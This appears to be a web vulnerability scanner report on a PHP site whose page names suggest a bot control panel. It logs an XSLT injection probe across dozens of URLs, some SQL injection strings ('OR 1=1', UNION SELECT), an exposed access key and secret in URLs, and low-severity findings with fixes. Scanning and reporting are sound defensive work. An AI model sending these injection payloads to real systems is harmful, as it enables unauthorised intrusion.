Request Header - size: 494 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 397 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Capture.PNG
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 475 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 293 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 489 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 799 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 714 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 509 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php?id=54
Method GET
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 754 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 278 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter tasks_page.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 511 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 284 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%20OR%201=1
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 295 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20--
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 482 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi%25'%20%20--%20/Sound%20Effects
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 501 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 404 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Capture.PNG
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 482 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 300 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects/error.wav
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 496 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav
Method GET
Parameter Sound Effects
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 715 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?bot=DESKTOP-95IQEEV
Method GET
Parameter gate.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 667 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54
Method GET
Parameter Bots.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 756 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54
Method GET
Parameter dashboard.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 860 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54
Method GET
Parameter tasks_page.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 756 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 806 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter 327qi
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 288 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects
Method GET
Parameter 327qi
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 490 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 500 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter Sound Effects
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 480 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav
Method GET
Parameter Sound Effects
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 490 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 386 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method GET
Parameter error.wav
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 496 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 788 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter host
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 743 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi
Method POST
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 297 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php
Method POST
Parameter TQUIA729JAULAMJS
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 529 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E
Method POST
Parameter tasks_page.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 531 bytes.
Request Body - size: 0 bytes.
Response Header - size: 240 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi
Method POST
Parameter login.php
Attack <xsl:value-of select="system-property('xsl:vendor')"/>
Evidence Apache
Request Header - size: 304 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
Instances 45
Solution
Sanitize and validate every user input coming from any client-side source.
Reference https://www.contextis.com/blog/xslt-server-side-injection-attacks
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 91
WASC Id 23
Plugin Id 90017
Low
Big Redirect Detected (Potential Sensitive Information Leak)
Description
The server has responded with a redirect that seems to provide a large response. This may indicate that although the server sent a redirect it also responded with body content (which may include sensitive details, PII, etc.).
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
Instances 1
Solution
Ensure that no sensitive information is leaked via redirect responses. Redirect responses should have almost no content.
Reference
Tags OWASP_2021_A04
WSTG-v42-INFO-05
OWASP_2017_A03
CWE Id 201
WASC Id 13
Plugin Id 10044
Low
Cookie No HttpOnly Flag
Description
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
Instances 7
Solution
Ensure that the HttpOnly flag is set for all cookies.
Reference https://owasp.org/www-community/HttpOnly
Tags OWASP_2021_A05
WSTG-v42-SESS-02
OWASP_2017_A06
CWE Id 1004
WASC Id 13
Plugin Id 10010
Low
Cookie without SameSite Attribute
Description
A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective countermeasure to cross-site request forgery, cross-site script inclusion, and timing attacks.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence Set-Cookie: PHPSESSID
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
Instances 7
Solution
Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
Reference https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site
Tags OWASP_2021_A01
WSTG-v42-SESS-02
OWASP_2017_A05
CWE Id 1275
WASC Id 13
Plugin Id 10054
Low
Cross-Domain JavaScript Source File Inclusion
Description
The page includes one or more script files from a third-party domain.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter https://cdn.jsdelivr.net/npm/chart.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://code.jquery.com/jquery-3.5.1.slim.min.js
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://code.jquery.com/jquery-3.5.1.slim.min.js
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter https://code.jquery.com/jquery-3.5.1.slim.min.js
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
Instances 10
Solution
Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.
Reference
Tags OWASP_2021_A08
CWE Id 829
WASC Id 15
Plugin Id 10017
Low
In Page Banner Information Leak
Description
The server returned a version banner string in the response content. Such information leaks may allow attackers to further target specific issues impacting the product and version in use.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
Instances 5
Solution
Configure the server to prevent such information leaks. For example:

Under Tomcat this is done via the "server" directive and implementation of custom error pages.

Under Apache this is done via the "ServerSignature" and "ServerTokens" directives.
Reference https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/
Tags OWASP_2021_A05
OWASP_2017_A06
WSTG-v42-INFO-02
CWE Id 200
WASC Id 13
Plugin Id 10009
Low
Insufficient Site Isolation Against Spectre Vulnerability
Description
The Cross-Origin-Resource-Policy header is an opt-in header designed to counter side-channel attacks like Spectre. A resource should be explicitly marked as shareable before it is served across different origins.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Cross-Origin-Resource-Policy
Attack
Evidence
Request Header - size: 574 bytes.
Request Body - size: 0 bytes.
Response Header - size: 364 bytes.
Response Body - size: 97,496 bytes.
Instances 1
Solution
Ensure that the application/web server sets the Cross-Origin-Resource-Policy header appropriately, with the value 'same-origin' for all web pages.

'same-site' is considered less secure and should be avoided.

If resources must be shared, set the header to 'cross-origin'.

